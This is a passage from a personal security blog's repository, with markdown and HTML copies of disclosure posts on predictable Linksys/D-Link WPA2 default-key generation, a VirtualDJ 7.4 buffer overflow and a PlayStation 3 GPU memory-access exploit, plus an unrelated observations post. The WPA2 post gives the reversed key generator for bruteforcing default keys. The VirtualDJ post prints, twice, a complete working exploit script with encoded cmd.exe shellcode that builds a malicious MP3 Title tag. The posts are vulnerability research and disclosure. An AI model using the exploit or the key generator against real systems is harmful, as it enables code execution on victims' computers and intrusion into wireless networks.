[http://www.mediafire.com/download.php?2h9y0pkay9id1rt](http://www.mediafire.com/download.php?2h9y0pkay9id1rt). 73 | 74 | 75 | ## Solutions 76 | 77 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/urandom` in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`. 78 | * If for some reason you want to use seeds for generating keys: 79 | * Make them bigger than 32-bit. Just 2^32 keys are easy to check. 80 | * Obtain them from a cryptographically secure PRNG. 81 | * If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. 82 | -------------------------------------------------------------------------------- /posts/2013-03-31-wpa2-vulnerability-linksys-dlink/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | WPA2 Key Generation Vulnerability: Linksys / D-Link 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

WPA2 Key Generation Vulnerability: Linksys / D-Link

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-03-31 72 |

73 |

After finding the TP-Link WPA2 Key Generation Vulnerability, I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers user nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here.

74 |

This time, the vulnerability affects the Linksys EasyLink Advisor and D-Link Quick Setup Wizard assistants, both based in Network Magic, a software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants.

75 |

The reversed generator is:

76 |
blacklist_windows = "1I2Z0O5SUV"
 77 | blacklist_macosx  = "B8DO0I1S5UVZ2"
 78 | blacklist = blacklist_windows  # Change me
 79 | 
 80 | def gen(seed):
 81 |     key = ""
 82 |     for i in range(10):
 83 |         while True:
 84 |             seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)
 85 |             edx = ((seed >> 0x10) & 0x7FFF) % 0x24
 86 |             if edx >= 0xA:
 87 |                 edx += 0x37
 88 |             else:
 89 |                 edx += 0x30
 90 |             if chr(edx) not in blacklist:
 91 |                 key += chr(edx)
 92 |                 break
 93 |     return key
 94 | 
95 | 96 | 97 |

The seeds used by this function are obtained in the exactly same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a whitelist, it adds random characters in range [0-9A-Z], filtering out those found in a hardcoded blacklist, meant to prevent adding visually similar characters such as '0' and 'O' to the key.

98 |

As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.

99 |

Affected routers

100 |

The complete list of affected Linksys routers is:

101 | 114 |

The complete list of affected D-Link routers is:

115 | 125 |

Resources

126 | 131 |

Solutions

132 | 139 |
140 |
141 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /posts/2013-04-20-virtualdj-74-buffer-overflow/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2013-04-20 4 | title: VirtualDJ Pro/Home 7.4: Buffer Overflow 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.4 and VirtualDJ Home 7.4](http://www.virtualdj.com/) and possibly previous versions of this software. After right-clicking a file and entering the "_File Infos_" > "_Cover..._" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: `"http://images.google.com/images?q=X"` where `X` corresponds to the ID3 tag _Title_. Special characters of this tag are ignored, and any sequence of symbols (e.g. `' '`, `'-'`, `'_'`) is replaced with `'+'`. The problem is [once again](../2013-03-30-virtualdj-73-buffer-overflow/) that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer. 9 | 10 | To exploit this vulnerability, I searched for a `call esp` instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, `"dLMD"`. After entering this call, all the bytes after the _Fake Title_ + _Spaces_ + _Padding_ + `"dLMD"` will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range `[0-9A-Za-z]`. For this purpose I used a function from [ALPHA3](http://code.google.com/p/alpha3/). After that, the original shellcode will be decoded and executed. 11 | 12 | ```python 13 | #Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability 14 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 15 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q 16 | 17 | def encodeData(decoder, data, validValues): 18 | assert data.find("\0") == -1, "Shellcode must be NULL free" 19 | data += "\0" #End of shellcode 20 | encData = decoder[-2:] 21 | decoder = decoder[:-2] 22 | for p in range(len(data)): 23 | dByte = ord(data[p]) 24 | pxByte = ord(encData[p+1]) 25 | bx, by = encoder(dByte ^ pxByte, validValues) 26 | encData += chr(bx) + chr(by) 27 | return decoder + encData 28 | 29 | def encoder(value, validValues): 30 | for bx in validValues: 31 | imul = (bx * 0x30) & 0xFF 32 | for by in validValues: 33 | if imul ^ by == value: return [bx, by] 34 | 35 | 36 | #Shellcode (e.g. run cmd.exe) 37 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" 38 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" 39 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" 40 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" 41 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" 42 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2 43 | shellcode += retAddress 44 | 45 | #Arguments 46 | fakeTitle = "Greatest Hits of the Internet - Nyan Cat" 47 | while fakeTitle[0] == " ": fakeTitle = fakeTitle[1:] 48 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1] 49 | for i in fakeTitle: 50 | if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -": 51 | raise "Invalid characters in the fake title" 52 | fakeTitle2 = fakeTitle.replace("-"," ") 53 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ") 54 | 55 | #Exploit 56 | exploit = fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1) 57 | exploit += "dLMD" #RETN address 58 | exploit += "XXAI" #ESP := Baseaddr of encoded payload 59 | exploit += encodeData( 60 | "TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP 61 | shellcode, 62 | map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz")) 63 | ) 64 | 65 | print exploit 66 | #Paste the generated code in the tag 'Title' of the MP3 file. 67 | ``` 68 | 69 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q. 70 | 71 | ## Log 72 | 73 | * __2013-04-07__: Bug discovered. VirtualDJ was emailed about this a few days later. 74 | * __2013-04-20__: Bug ignored. Exploit published. 75 | -------------------------------------------------------------------------------- /posts/2013-04-20-virtualdj-74-buffer-overflow/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | VirtualDJ Pro/Home 7.4: Buffer Overflow 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

VirtualDJ Pro/Home 7.4: Buffer Overflow

65 |

66 | AuthorAlexandro Sanchez 69 | Date2013-04-20 72 |

73 |

I have found a buffer overflow vulnerability in VirtualDJ Pro 7.4 and VirtualDJ Home 7.4 and possibly previous versions of this software. After right-clicking a file and entering the "File Infos" > "Cover..." menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: "http://images.google.com/images?q=X" where X corresponds to the ID3 tag Title. Special characters of this tag are ignored, and any sequence of symbols (e.g. ' ', '-', '_') is replaced with '+'. The problem is once again that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.

74 |

To exploit this vulnerability, I searched for a call esp instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, "dLMD". After entering this call, all the bytes after the Fake Title + Spaces + Padding + "dLMD" will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range [0-9A-Za-z]. For this purpose I used a function from ALPHA3. After that, the original shellcode will be decoded and executed.

75 |
#Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability 
 76 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
 77 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q 
 78 | 
 79 | def encodeData(decoder, data, validValues):
 80 |     assert data.find("\0") == -1, "Shellcode must be NULL free"
 81 |     data += "\0" #End of shellcode 
 82 |     encData = decoder[-2:]
 83 |     decoder = decoder[:-2]
 84 |     for p in range(len(data)):
 85 |         dByte = ord(data[p])
 86 |         pxByte = ord(encData[p+1])
 87 |         bx, by = encoder(dByte ^ pxByte, validValues)
 88 |         encData += chr(bx) + chr(by)
 89 |     return decoder + encData
 90 | 
 91 | def encoder(value, validValues): 
 92 |       for bx in validValues:
 93 |         imul = (bx * 0x30) &amp; 0xFF
 94 |         for by in validValues:
 95 |             if imul ^ by == value: return [bx, by]
 96 | 
 97 | 
 98 | #Shellcode (e.g. run cmd.exe) 
 99 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
100 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
101 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
102 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
103 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
104 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2 
105 | shellcode += retAddress
106 | 
107 | #Arguments 
108 | fakeTitle  = "Greatest Hits of the Internet - Nyan Cat"
109 | while fakeTitle[0]  == " ": fakeTitle = fakeTitle[1:]
110 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1]
111 | for i in fakeTitle:
112 |     if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -":
113 |         raise "Invalid characters in the fake title"
114 | fakeTitle2 = fakeTitle.replace("-"," ")
115 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ")
116 | 
117 | #Exploit 
118 | exploit =  fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1)
119 | exploit += "dLMD" #RETN address 
120 | exploit += "XXAI" #ESP := Baseaddr of encoded payload 
121 | exploit += encodeData(
122 |     "TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP 
123 |     shellcode,
124 |     map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"))
125 | )
126 | 
127 | print exploit
128 | #Paste the generated code in the tag 'Title' of the MP3 file.
129 | 
130 | 131 | 132 |

You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.

133 |

Log

134 | 138 |
139 |
140 | 146 | 147 | 148 | -------------------------------------------------------------------------------- /posts/2016-03-16-ps3-gpu-exploit/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: post 3 | date: 2016-03-16 4 | title: PS3 GPU Full VRAM/IO access exploit 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | ## Introduction 9 | 10 | During the early development of the PlayStation 3 emulator project [Nucleus](https://github.com/AlexAltea/nucleus), it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to *LV2*. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix `sys_rsx`, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the `lv1_gpu` syscalls. 11 | 12 | Between February 2016 and March 2016, the developer *@3141card* reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the [Envytools](https://github.com/envytools/envytools)/[Nouveau](https://nouveau.freedesktop.org) projects and advice from *@mwk* eased the security analysis, resulting in the vulnerability presented here. 13 | 14 | ## Reality Synthesizer 15 | 16 | The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs): 17 | 18 | | BAR | Offset | Size | Description | 19 | |--------|-----------------|---------|-------------| 20 | | *BAR0* | `0x28000000000` | 32 MB | MMIO | 21 | | *BAR1* | `0x28080000000` | 256 MB | VRAM | 22 | | *BAR2* | `0x28002000000` | *???* | RAMIN | 23 | 24 | While *BAR0* points to the MMIO register area, both *BAR1* and *BAR2* map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa: 25 | 26 | ```cpp 27 | uint32_t addr_vram_to_pramin(uint32_t offset) { 28 | uint32_t vram_size = 0x10000000; // 256 MB 29 | uint32_t rev_size = 0x80000; // 512 KB 30 | return (offset - vram_size) ^ -rev_size; 31 | } 32 | 33 | uint32_t addr_ramin_to_vram(uint32_t offset) { 34 | uint32_t vram_size = 0x10000000; // 256 MB 35 | uint32_t rev_size = 0x80000; // 512 KB 36 | return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size); 37 | } 38 | ``` 39 | 40 | The driver fills RAMIN with objects which can be either *Engine objects* or *DMA objects*, commonly known as *FIFO objects*. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location. 41 | 42 | Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as *RAMHT* which maps a unique handler to the RAMIN offset where the target DMA object is located. 43 | 44 | The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets: 45 | 46 | | Offset | Description | 47 | |-----------------------------|-------------------| 48 | | `0x00000000` - `0x0FFFFFFF` | VRAM | 49 | | `0x80000000` - `0x8FFFFFFF` | IOMMU (Context 0) | 50 | | `0x90000000` - `0x9FFFFFFF` | IOMMU (Context 1) | 51 | 52 | ## Exploit 53 | 54 | ### RSX MMIO register mapping 55 | 56 | The LV2 kernel provides the following syscall: 57 | 58 | ```cpp 59 | // LV2 SysCall 675 (0x2A3) 60 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id); 61 | ``` 62 | 63 | The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability: 64 | 65 | | Device | MMIO | VRAM | Description | Control | 66 | |--------|----------------|------------------|-----------------|---------| 67 | | 5 | `0x08A000` | `----------` | | No | 68 | | 6 | `0x200000` | `----------` | PMEDIA | No | 69 | | 7 | `0x600000` | `----------` | PCRTC | No | 70 | | 8 | `--------` | `0x0FF10000` | | No | 71 | | 9 | `0x400000` | `----------` | PGRAPH | Yes | 72 | | 10 | `0x100000` | `----------` | PFB | Yes | 73 | | 11 | `0x00A000` | `----------` | PCOUNTER | Yes | 74 | | 12 | `0x680000` | `----------` | | Yes | 75 | | 13 | `0x090000` | `----------` | | Yes | 76 | | __14__ | __`0x002000`__ | __`----------`__ | __PFIFO__ | __Yes__ | 77 | | 15 | `0x088000` | `----------` | IOIF | Yes | 78 | 79 | By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if `ss.param.fself.control` prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below: 80 | 81 | * `0x002140` *NV03_PFIFO_INTR_EN_0*: Disable the interrupts that trigger LV1 panics. 82 | * `0x002210` *NV03_PFIFO_RAMHT*: Controls the size and RAMIN offset of RAMHT. 83 | * `0x002218` *NV03_PFIFO_RAMRO*: Controls the size and RAMIN offset of RAMRO. 84 | * `0x002504` *NV04_PFIFO_MODE*: Alternate between PIO and DMA mode in channels. 85 | 86 | These register fields are described in detail here in [nv1_pfifo.xml](https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml). CellOS-LV1 sets RAMHT at RAMIN offset `0x10000` and a 16 KB uin size and RAMRO at RAMIN offset `0x18000` with 512 bytes in size. 87 | 88 | ### RAMHT manipulation attempt 89 | 90 | Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range *0x0* to *0x1F000* and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying: 91 | 92 | 1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel). 93 | 2. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range `[0x20000-0xFFFFF]` (mappable VRAM). 94 | 3. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB. 95 | 96 | These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range. 97 | 98 | ### RAMRO as RAMHT entry generator 99 | 100 | However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range *0x0* to *0x1FE00* and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten: 101 | 102 | 1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }. 103 | 2. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }. 104 | 3. Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }. 105 | 106 | After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range `0xC00` - `0xCFF` (note that `0xC00` is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision. 107 | 108 | ### Accessing custom DMA objects 109 | 110 | The reserved VRAM for `vsh.self` (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.: 111 | 112 | ```cpp 113 | 0x00808000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4) 114 | ``` 115 | 116 | The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range: 117 | 118 | * `0x0060` *NV406E_SET_CONTEXT_DMA_SEMAPHORE*: Set DMA object handle (i.e. the `0x504010XX` reports above) 119 | * `0x0064` *NV406E_SEMAPHORE_OFFSET*: Set the offset we want to write in. 120 | * `0x006C` *NV406E_SEMAPHORE_RELEASE*: Write the specified value there. 121 | 122 | If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded. 123 | -------------------------------------------------------------------------------- /posts/2016-03-16-ps3-gpu-exploit/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | PS3 GPU Full VRAM/IO access exploit 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

PS3 GPU Full VRAM/IO access exploit

65 |

66 | AuthorAlexandro Sanchez 69 | Date2016-03-16 72 |

73 |

Introduction

74 |

During the early development of the PlayStation 3 emulator project Nucleus, it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to LV2. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix sys_rsx, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the lv1_gpu syscalls.

75 |

Between February 2016 and March 2016, the developer @3141card reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the Envytools/Nouveau projects and advice from @mwk eased the security analysis, resulting in the vulnerability presented here.

76 |

Reality Synthesizer

77 |

The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):

78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 |
BAROffsetSizeDescription
BAR00x2800000000032 MBMMIO
BAR10x28080000000256 MBVRAM
BAR20x28002000000???RAMIN
108 |

While BAR0 points to the MMIO register area, both BAR1 and BAR2 map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:

109 |
uint32_t addr_vram_to_pramin(uint32_t offset) {
110 |     uint32_t vram_size = 0x10000000; // 256 MB
111 |     uint32_t rev_size = 0x80000; // 512 KB
112 |     return (offset - vram_size) ^ -rev_size;
113 | }
114 | 
115 | uint32_t addr_ramin_to_vram(uint32_t offset) {
116 |     uint32_t vram_size = 0x10000000; // 256 MB
117 |     uint32_t rev_size = 0x80000; // 512 KB
118 |     return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size);
119 | }
120 | 
121 | 122 | 123 |

The driver fills RAMIN with objects which can be either Engine objects or DMA objects, commonly known as FIFO objects. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location.

124 |

Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as RAMHT which maps a unique handler to the RAMIN offset where the target DMA object is located.

125 |

The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:

126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 |
OffsetDescription
0x00000000 - 0x0FFFFFFFVRAM
0x80000000 - 0x8FFFFFFFIOMMU (Context 0)
0x90000000 - 0x9FFFFFFFIOMMU (Context 1)
148 |

Exploit

149 |

RSX MMIO register mapping

150 |

The LV2 kernel provides the following syscall:

151 |
// LV2 SysCall 675 (0x2A3)
152 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id);
153 | 
154 | 155 | 156 |

The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:

157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 |
DeviceMMIOVRAMDescriptionControl
50x08A000----------No
60x200000----------PMEDIANo
70x600000----------PCRTCNo
8--------0x0FF10000No
90x400000----------PGRAPHYes
100x100000----------PFBYes
110x00A000----------PCOUNTERYes
120x680000----------Yes
130x090000----------Yes
140x002000----------PFIFOYes
150x088000----------IOIFYes
247 |

By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if ss.param.fself.control prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below:

248 | 254 |

These register fields are described in detail here in nv1_pfifo.xml. CellOS-LV1 sets RAMHT at RAMIN offset 0x10000 and a 16 KB uin size and RAMRO at RAMIN offset 0x18000 with 512 bytes in size.

255 |

RAMHT manipulation attempt

256 |

Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range 0x0 to 0x1F000 and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying:

257 |
    258 |
  1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).
  2. 259 |
  3. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range [0x20000-0xFFFFF] (mappable VRAM).
  4. 260 |
  5. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.
  6. 261 |
262 |

These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.

263 |

RAMRO as RAMHT entry generator

264 |

However, there is still a way to get such entries in RAMHT. RAMRO can only be relocated in the range 0x0 to 0x1FE00 and have an alignment of 512 byte. The submission of invalid PFIFO commands causes 8 byte writes in RAMRO in which the first word holds the error report and the second word the submitted argument. We can control the argument and predict the error report, thus being able to generate valid RAMHT entries. In order to preserve the integrity of RAMHT we should ensure that no existing entry is overwritten:

265 |
    266 |
  1. Invalid PFIFO methods that trigger RAMRO writes in PIO mode are: { 0x0040, 0x0044, 0x0048, 0x0054 }.
  2. 267 |
  3. Their corresponding RAMRO error reports are { 0x50401040, 0x50401044, 0x50401048, 0x50401054 }.
  4. 268 |
  5. Their corresponding RAMHT offset for channel 1 are: { 0x0C18, 0x0C38, 0x0C58, 0x0CB8 }.
  6. 269 |
270 |

After computing the RAMHT offsets for all pairs consisting of any handles ever created by the LV1 driver and any possible channels ID (up to the maximum of 4 that LV1 supports), we know that no handle will ever be placed by the driver in the RAMHT range 0xC00 - 0xCFF (note that 0xC00 is 512 byte aligned). Threfore RAMRO could be moved inside RAMHT without fearing a collision.

271 |

Accessing custom DMA objects

272 |

The reserved VRAM for vsh.self (VirtualShell/XMB), i.e. channel 0, is allocated from the front and the remaining VRAM aside from the first 2 MB of RAMIN is assigned to the application, i.e. channel 1, by the GCM library. Therefore any RAMIN offset bigger than 2 MB assigned to channel 1 will lie in an accessible VRAM area. E.g.:

273 |
0x00808000 == (1 /*Channel ID*/ << 23) | (0x800000 /*RAMIN offset at 8 MB*/ >> 4)
274 | 
275 | 276 | 277 |

The only remaining step is placing our custom DMA object in that offset. Finally a combination of the PFIFO puller methods can be used to trigger a write in our custom DMA range:

278 | 283 |

If the specified value ends up at said offset in the range specified by our DMA object the exploit succeeded.

284 |
285 |
286 | 292 | 293 | 294 | -------------------------------------------------------------------------------- /posts/2016-08-22-observations/_main.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: live 3 | date: 2016-08-22 4 | title: Observations 5 | author: Alexandro Sanchez 6 | --- 7 | 8 | Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me. 9 | 10 | ## Light 11 | 12 | * When observing a blacklight or UV-A light, i.e. one of these blue/purple-ish lamps that make white and fluorescent objects specially bright, my eyes disagree on the perceived light. From my point of view: My left eye shows it blurry, as if it couldn't focus on the light source and with a slightly darker-blue hue. My right eye can focuses correctly on the light source, but perceives it with a slightly brighter-purple color. 13 | 14 | * Doing fast eye movements while keeping a LED-based white light in my field of view, makes the light be perceived as separate red-green-blue components at different positions. Why does this happen? 15 | 16 | * When firing small handheld lasers, one can perceive a fine-grained pattern of dots where the beam hits. Any small translation or rotation of the laser diode seem to completely change this pattern. Since involuntary movements are hard to avoid the resulting effect looks like video noise. Why does this happen? 17 | 18 | 19 | ## Climate 20 | 21 | * Suggested by the *clathrate gun hypothesis* [1], the rise in global temperatures will cause, or is causing, vast amounts of methane gas to be released to the athmosphere. The impact of methane gas is more than 25 times higher than carbon dioxide [2], thus resulting in devastating consequences for the whole planet. The burning methane corresponds to the reaction: CH4 + 2 O2 -> CO2 + 2 H2O. Question: Assuming the chain reaction has already started and is inevitable, why don't we burn the methane deposits under the siberian permafrost? 22 | 1. https://en.wikipedia.org/wiki/Clathrate_gun_hypothesis 23 | 2. https://www3.epa.gov/climatechange/ghgemissions/gases/ch4.html 24 | -------------------------------------------------------------------------------- /posts/2016-08-22-observations/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Observations 8 | 9 | 10 | 11 | 51 | 52 | 53 |
54 | 61 | < Other articles 62 |
63 |
64 |

Observations

65 |

66 | AuthorAlexandro Sanchez 69 | Date2016-08-22 72 |

73 |

Random observations, questions, and interesting facts that caught my attention. If you can expand or answer any of these, please feel free to contact me.

74 |

Light

75 | 86 |

Climate

87 | 94 |
95 |
